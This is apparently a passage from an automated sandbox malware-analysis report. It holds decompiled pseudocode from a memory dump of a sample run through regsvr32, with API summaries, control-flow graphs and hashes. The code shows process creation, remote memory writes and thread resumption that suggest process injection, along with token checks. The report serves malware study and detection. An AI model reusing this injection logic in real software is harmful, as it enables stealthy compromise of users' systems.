								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E0099DADC( &_v40);
									_t63 =  *0x9af8d0; // 0x452f8c0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x9af8d0; // 0x452f8c0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x9af8d0; // 0x452f8c0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x9af8d0; // 0x452f8c0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x9af8d0; // 0x452f8c0
							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E00998DDF(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}




























            0x0099d88f
            0x0099d898
            0x0099d89b
            0x0099d89d
            0x0099d8a2
            0x0099d8a4
            0x0099d8a7
            0x0099d8a9
            0x0099d9dd
            0x0099d9dd
            0x0099d8af
            0x0099d8c1
            0x0099d8c6
            0x0099d8c9
            0x0099d8ce
            0x0099d9ca
            0x0099d9d0
            0x00000000
            0x0099d9d9
            0x0099d8d4
            0x0099d8dc
            0x0099d8de
            0x0099d8e1
            0x0099d8f0
            0x0099d8fb
            0x0099d901
            0x0099d906
            0x0099d908
            0x0099d915
            0x0099d91d
            0x0099d928
            0x0099d933
            0x0099d937
            0x0099d939
            0x0099d942
            0x0099d949
            0x0099d94e
            0x0099d950
            0x0099d955
            0x0099d95b
            0x0099d95d
            0x0099d95d
            0x0099d95e
            0x0099d95e
            0x0099d964
            0x0099d964
            0x0099d967
            0x0099d967
            0x0099d91d
            0x0099d96e
            0x0099d972
            0x0099d974
            0x0099d97d
            0x0099d97d
            0x0099d983
            0x0099d98b
            0x0099d98e
            0x0099d996
            0x0099d996
            0x0099d999
            0x0099d99a
            0x0099d9a0
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0099d9a0
            0x0099d9a9
            0x0099d9ac
            0x0099d9ad
            0x0099d9b2
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0099d9b8
            0x00000000
            0x00000000
            0x00000000
            0x0099d9b8
            0x0099d9b8
            0x0099d9bb
            0x0099d9c1
            0x0099d9c5

            APIs
              • Part of subcall function 00998F63: memset.MSVCRT ref: 00998F75
              • Part of subcall function 0099BE10: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0099BE52
              • Part of subcall function 0099D9DE: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0099DA40
              • Part of subcall function 0099D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0099DA89
              • Part of subcall function 0099D9DE: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0099DAA6
              • Part of subcall function 0099D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0099DAC7
            • GetLastError.KERNEL32(?,?,00000001), ref: 0099D939
              • Part of subcall function 0099DADC: ResumeThread.KERNELBASE(?,0099D947,?,?,00000001), ref: 0099DAE4
            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0099D964
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
            • String ID:
            • API String ID: 2212882986-0
            • Opcode ID: 1dab45250752cc32c50ca4b92e2e4e66382ca07e458d6cf4485edfa261370f15
            • Instruction ID: c0340ee95125cf3dbd52fa6d0f513245a17f590b73a5459c4e32da4fcd85dc0e
            • Opcode Fuzzy Hash: 1dab45250752cc32c50ca4b92e2e4e66382ca07e458d6cf4485edfa261370f15
            • Instruction Fuzzy Hash: 11415072A02209AFCF10EFADD9C5BAE77F9FF89310F144069E905A7251DB349E008B60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00996603 Relevance: 3.1, APIs: 2, Instructions: 78threadCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 61%
            			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x9af8d0; // 0x452f8c0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E00998DB4();
				E00999787();
				 *0x9af8e8 = _a4;
				E009A3D36(_a4);
				 *_t49 = 0xf2e;
				 *0x9af8d0 = E0099F0D9(0x9aca88, 0x138);
				 *_t49 = 0xe8d;
				_t23 = E00999F85(0x9aca88);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E00998D9A();
					 *_t49 = 0x1f4;
					_t28 = E0099FCDA(E0099109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x9af8e0 = E0099F0D9(0x9acbf0, _t48);
						E0099647A(_t48, __eflags);
						E00998DDF( &_a8, 0xfffffffe);
						_t36 =  *0x9af8d0; // 0x452f8c0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x641);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E009963A2, 0, 0,  &_v8);
					 *0x9af8f4 = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E00998D9A();
				goto L3;
			}













            0x00996606
            0x0099660b
            0x009966ef
            0x009966f3
            0x009966e8
            0x009966ea
            0x00000000
            0x009966ea
            0x009966f5
            0x009966ff
            0x0099666a
            0x00000000
            0x0099666a
            0x00996611
            0x00996616
            0x0099661f
            0x00996624
            0x0099662e
            0x0099663f
            0x00996644
            0x0099664b
            0x00996650
            0x00996652
            0x00996655
            0x00996661
            0x00996662
            0x0099666e
            0x00996673
            0x00996682
            0x00996687
            0x0099668a
            0x0099668c
            0x00996695
            0x009966a0
            0x009966a5
            0x009966b0
            0x009966b5
            0x009966bf
            0x009966bf
            0x009966d9
            0x009966dc
            0x009966df
            0x009966e4
            0x009966e6
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009966e6
            0x00996664
            0x00000000

            APIs
              • Part of subcall function 00998DB4: HeapCreate.KERNELBASE(00000000,00096000,00000000,00996616), ref: 00998DBD
              • Part of subcall function 0099F0D9: GetModuleHandleA.KERNEL32(00000000,?,?,?,009ACA88,?,0099663F,?), ref: 0099F0FB
            • GetFileAttributesW.KERNELBASE(00000000), ref: 00996655
            • CreateThread.KERNELBASE(00000000,00000000,009963A2,00000000,00000000,?), ref: 009966DC
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Create$AttributesFileHandleHeapModuleThread
            • String ID:
            • API String ID: 607385197-0
            • Opcode ID: 6a8e4745cb2088ffc2b29b783c38fdadf292839e0e7bc0e6c3cc6b5d05415620
            • Instruction ID: bf56cd113f0baa78466b4f92b6fb4ea832b728037a178fc0d21a005db434d07c
            • Opcode Fuzzy Hash: 6a8e4745cb2088ffc2b29b783c38fdadf292839e0e7bc0e6c3cc6b5d05415620
            • Instruction Fuzzy Hash: 15217AB1514205AFDF04AFBDE816B6E37E8AF86310F10852AF15ACA1D1EF78C9409B61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099F0D9 Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 329 99f0d9-99f0f9 call 999f6b 332 99f0fb-99f101 GetModuleHandleA 329->332 333 99f103-99f108 LoadLibraryA 329->333 334 99f10a-99f10c 332->334 333->334 335 99f11b-99f129 call 998d87 334->335 336 99f10e-99f113 call 99f08e 334->336 339 99f118-99f119 336->339 339->335
            C-Code - Quality: 47%
            			E0099F0D9(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E00999F6B(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf2e) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0099F08E(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E00998D87( &_v8);
				return _t25;
			}










            0x0099f0dc
            0x0099f0df
            0x0099f0e5
            0x0099f0e7
            0x0099f0ec
            0x0099f0ee
            0x0099f0f8
            0x0099f0f9
            0x0099f108
            0x0099f0fb
            0x0099f0fb
            0x0099f0fb
            0x0099f10c
            0x0099f113
            0x0099f119
            0x0099f119
            0x0099f11e
            0x0099f129

            APIs
            • GetModuleHandleA.KERNEL32(00000000,?,?,?,009ACA88,?,0099663F,?), ref: 0099F0FB
            • LoadLibraryA.KERNELBASE(00000000,?,?,?,009ACA88,?,0099663F,?), ref: 0099F108
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID:
            • API String ID: 4133054770-0
            • Opcode ID: b8ca7bbb35f43a7a700dc1eb33fd1668d54985cd4d535760c0a65b824c45a08f
            • Instruction ID: 9992f8e24e46978e44fd4ea18a4b5174d0ced29fe42c3a14b89e6500fd087767
            • Opcode Fuzzy Hash: b8ca7bbb35f43a7a700dc1eb33fd1668d54985cd4d535760c0a65b824c45a08f
            • Instruction Fuzzy Hash: E9F0A732318114EBDB14ABADDC5556AF7EDDF99391714413AF002D7151DEB08D4197D0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099CA5A Relevance: 1.6, APIs: 1, Instructions: 82COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 341 99ca5a-99ca79 call 99c92f 344 99ca7f-99ca96 call 99c986 341->344 345 99cb14-99cb17 341->345 348 99ca98-99cab9 344->348 349 99caf6-99cb04 FindCloseChangeNotification 344->349 348->349 355 99cabb-99cabd 348->355 350 99cb12 349->350 351 99cb06-99cb11 call 998ddf 349->351 350->345 351->350 356 99cae9-99caf4 355->356 357 99cabf-99cac2 355->357 356->349 358 99cac5-99cad4 357->358 361 99cae6-99cae8 358->361 362 99cad6-99cae2 358->362 361->356 362->358 363 99cae4 362->363 363->356
            C-Code - Quality: 47%
            			E0099CA5A(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E0099C92F(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E0099C986(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E00998DDF( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x9af8d8; // 0x452fab0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x9af8d8; // 0x452fab0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x9af8d8; // 0x452fab0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















            0x0099ca61
            0x0099ca63
            0x0099ca6a
            0x0099ca6c
            0x0099ca6f
            0x0099ca74
            0x0099ca79
            0x0099ca83
            0x0099ca86
            0x0099ca89
            0x0099ca8e
            0x0099ca90
            0x0099ca96
            0x0099caf6
            0x0099cafe
            0x0099cb04
            0x0099cb0b
            0x0099cb11
            0x00000000
            0x0099cb12
            0x0099ca9b
            0x0099ca9c
            0x0099ca9d
            0x0099ca9e
            0x0099ca9f
            0x0099caa0
            0x0099caa1
            0x0099caa2
            0x0099caa7
            0x0099caa9
            0x0099caae
            0x0099caaf
            0x0099cab9
            0x00000000
            0x00000000
            0x0099cabd
            0x0099cae9
            0x0099cae9
            0x0099caf1
            0x0099caf4
            0x00000000
            0x0099caf4
            0x0099cabf
            0x0099cabf
            0x0099cac2
            0x0099cac5
            0x0099cac5
            0x0099cac8
            0x0099caca
            0x0099cad4
            0x00000000
            0x00000000
            0x0099cad9
            0x0099cada
            0x0099cadd
            0x0099cae2
            0x00000000
            0x00000000
            0x00000000
            0x0099cae4
            0x0099cae8
            0x00000000
            0x0099cae8
            0x0099cb17

            APIs
              • Part of subcall function 0099C92F: GetCurrentThread.KERNEL32 ref: 0099C942
              • Part of subcall function 0099C92F: GetLastError.KERNEL32(?,?,0099CA74,00000000,00990000), ref: 0099C950
              • Part of subcall function 0099C986: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,00990000,00000000,00000000,?,0099CA07,00000000,00000000,?,0099CA30), ref: 0099C9A1
              • Part of subcall function 0099C986: GetLastError.KERNEL32(?,0099CA07,00000000,00000000,?,0099CA30,00001644,?,0099E053), ref: 0099C9A8
            • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,00990000), ref: 0099CAFE
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$ChangeCloseCurrentFindInformationNotificationThreadToken
            • String ID:
            • API String ID: 3430231349-0
            • Opcode ID: c95803c7f08cba529b75e2e2c1bde2be13d4712e39b9fe19b59cac35be8a7179
            • Instruction ID: 67ef4083e0d533e6d4dbebb746edd1a1b95662a9e481d8883548aa382d220768
            • Opcode Fuzzy Hash: c95803c7f08cba529b75e2e2c1bde2be13d4712e39b9fe19b59cac35be8a7179
            • Instruction Fuzzy Hash: C82149B2A05209AFDB10DFEDDC85AAEB7F8EF48700B104469E501E7261E7309A419B90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009963A2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 364 9963a2-9963bb call 99651e GetOEMCP call 99dfc2 369 9963bd-9963be 364->369 370 9963c0-9963eb call 9a3c36 364->370 371 996435 369->371 374 9963ed-9963f3 370->374 375 9963f5-9963fb call 99d889 370->375 376 99640f-99641b 374->376 380 996400-996407 375->380 378 99642d call 993597 376->378 379 99641d-996422 call 9961e8 376->379 386 996432-996434 378->386 379->386 383 996409 380->383 384 996424-99642b 380->384 383->376 384->378 384->386 386->371
            C-Code - Quality: 100%
            			E009963A2(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				void* _t27;

				_t32 = __fp0;
				E0099651E();
				GetOEMCP();
				_t13 = E0099DFC2(__fp0); // executed
				 *0x9af8d4 = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x9af8d4; // 0x452fc00
					E009A3C36( *((intOrPtr*)(_t14 + 0x224)));
					_t26 =  *0x9af8d4; // 0x452fc00
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t16 = E0099D889(_t26); // executed
						__eflags = _t16;
						_t17 =  *0x9af8d4; // 0x452fc00
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E00993597();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x9af8d4; // 0x452fc00
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E009961E8(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}












            0x009963a2
            0x009963a2
            0x009963a7
            0x009963ae
            0x009963b3
            0x009963bb
            0x009963c4
            0x009963ca
            0x009963d5
            0x009963da
            0x009963e0
            0x009963e1
            0x009963eb
            0x009963fb
            0x00996400
            0x00996402
            0x00996407
            0x00996424
            0x0099642b
            0x00996432
            0x00996432
            0x00000000
            0x00996434
            0x0099642d
            0x0099642d
            0x00000000
            0x0099642d
            0x00996409
            0x0099640f
            0x0099640f
            0x00996414
            0x0099641b
            0x00000000
            0x00000000
            0x0099641d
            0x00000000
            0x0099641d
            0x009963ed
            0x00000000
            0x009963ed
            0x00000000

            APIs
            • GetOEMCP.KERNEL32 ref: 009963A7
              • Part of subcall function 0099DFC2: GetCurrentProcessId.KERNEL32 ref: 0099DFE9
              • Part of subcall function 0099DFC2: GetLastError.KERNEL32 ref: 0099E0E3
              • Part of subcall function 0099DFC2: GetSystemMetrics.USER32(00001000), ref: 0099E0F3
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CurrentErrorLastMetricsProcessSystem
            • String ID:
            • API String ID: 1196160345-0
            • Opcode ID: afad13ba6d76932bfebd23d31a95ebb4652672af16c9e353c7547473f2dd5ca8
            • Instruction ID: f5ec034cfb88fccff0ef2b95a0c10cf74fab1097d7bcdfdafb235bdd0e1f71b8
            • Opcode Fuzzy Hash: afad13ba6d76932bfebd23d31a95ebb4652672af16c9e353c7547473f2dd5ca8
            • Instruction Fuzzy Hash: 49018F711182528FCB24EFACEA09BA673E4FF56310F19057AF1458A432C7388840D7E1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099CA0A Relevance: 1.5, APIs: 1, Instructions: 34COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0099CA0A(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x9af8d8; // 0x452fab0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E0099C9F3(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x9af8d0; // 0x452f8c0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










            0x0099ca0e
            0x0099ca16
            0x0099ca1e
            0x0099ca23
            0x0099ca2b
            0x0099ca30
            0x0099ca34
            0x0099ca52
            0x0099ca55
            0x0099ca36
            0x0099ca39
            0x0099ca3b
            0x0099ca43
            0x0099ca43
            0x0099ca46
            0x0099ca46
            0x0099ca59
            0x0099ca26
            0x0099ca26
            0x0099ca26

            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 848afc9c68a2f4e78559cf6a1c8723909ef61c39f433024aad4763c15fe18921
            • Instruction ID: 7ad299f3a4c7fa9fa75941372c5f6f56b0042af0a42350592f57192e13b049e0
            • Opcode Fuzzy Hash: 848afc9c68a2f4e78559cf6a1c8723909ef61c39f433024aad4763c15fe18921
            • Instruction Fuzzy Hash: CCF0F471A21158EFCF10DBA8CD55A9D72A8FF08345B1040A4A502E7560D778DE00AB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00996438 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00996438() {
				intOrPtr _t3;

				_t3 =  *0x9af8d0; // 0x452f8c0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x9af8f4, 0xffffffff);
				ExitProcess(0);
			}




            0x00996438
            0x00996445
            0x0099644f

            APIs
            • ExitProcess.KERNEL32(00000000), ref: 0099644F
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: e3085101a3c9baabe42d785a48684cfe763b28fce2862763a38fbba94c2cbd39
            • Instruction ID: ad164364a787b7d30bb5c02912b1750e9756a1814c690253a8b5dd60865d427f
            • Opcode Fuzzy Hash: e3085101a3c9baabe42d785a48684cfe763b28fce2862763a38fbba94c2cbd39
            • Instruction Fuzzy Hash: 8DC002712281519FC740ABA8DD59F1437E0FF0A722F1986B5F52A9A5F9CA249400AB40
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00998DC9 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00998DC9(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x9af9b8, 8, _a4); // executed
				return _t2;
			}




            0x00998dd7
            0x00998dde

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,?,00999793,00000100,?,0099661B), ref: 00998DD7
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: f06ecd1267f5f4148016d856744a9ccb1f438cbbc5fb8cb9c79c09630a5bc556
            • Instruction ID: 33739c0abedf4983fd94ac50a1585cb12b91d7759698a37196cf9d430474336f
            • Opcode Fuzzy Hash: f06ecd1267f5f4148016d856744a9ccb1f438cbbc5fb8cb9c79c09630a5bc556
            • Instruction Fuzzy Hash: E1B0923A098208BBCF411B85EC09A853F29FF4A791F004020F608084708B636461ABC1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099DADC Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
            Download Yara Rule
            C-Code - Quality: 58%
            			E0099DADC(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}




            0x0099dae4
            0x0099daec
            0x0099daf1

            APIs
            • ResumeThread.KERNELBASE(?,0099D947,?,?,00000001), ref: 0099DAE4
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: 139c207a68e47d77130d3865257a4003f4730408928f8cca7feb87ed1590e17b
            • Instruction ID: 8d3b4d605e9c195432ee3c0b6520a4a2c7ec394213efaaac11377bfcb0330c94
            • Opcode Fuzzy Hash: 139c207a68e47d77130d3865257a4003f4730408928f8cca7feb87ed1590e17b
            • Instruction Fuzzy Hash: 86B092322A40019BCB005BB8DC1A9A03BE0FF56706B98C2F4A006C6461C22EC4459B80
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00998DB4 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00998DB4() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x9af9b8 = _t1;
				return _t1;
			}




            0x00998dbd
            0x00998dc3
            0x00998dc8

            APIs
            • HeapCreate.KERNELBASE(00000000,00096000,00000000,00996616), ref: 00998DBD
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: 5310c218fbdb4435e2ddadd5d63ee04c82fbafa3c9255576b1243241a19f733c
            • Instruction ID: 2357291fe190894ee31ab995e03bb12305df61d57e5fef07594bcec4ffc85b5b
            • Opcode Fuzzy Hash: 5310c218fbdb4435e2ddadd5d63ee04c82fbafa3c9255576b1243241a19f733c
            • Instruction Fuzzy Hash: 95B012706AD310A6DB500B605C4AB0135106B85B42F200011B609581D0C7B01000B555
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099DAF2 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
            Download Yara Rule
            C-Code - Quality: 91%
            			E0099DAF2(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E0099A236(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}









            0x0099daf5
            0x0099daf6
            0x0099daf9
            0x0099dafc
            0x0099db01
            0x0099db04
            0x0099db07
            0x0099db07
            0x0099db0f
            0x0099db14
            0x0099db17
            0x0099db1a
            0x0099db1d
            0x0099db20
            0x0099db33
            0x0099db34
            0x0099db37
            0x0099db3d
            0x0099db40
            0x0099db43
            0x00000000
            0x00000000
            0x0099db45
            0x00000000
            0x0099db43
            0x0099db49
            0x0099db49
            0x0099db4b
            0x0099db4b
            0x0099db4e
            0x0099db4e
            0x0099db53
            0x0099db5b
            0x0099db67

            APIs
            • Sleep.KERNELBASE(0000000A), ref: 0099DB5B
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: c49848dfa43f467ec181333fc60d5a812df7b63941279ac27b13c7b62db94e77
            • Instruction ID: 5149f6a0f386df9a8ee2f254ccf7bbfd2637b71ed49ccc6902a5e187a7829560
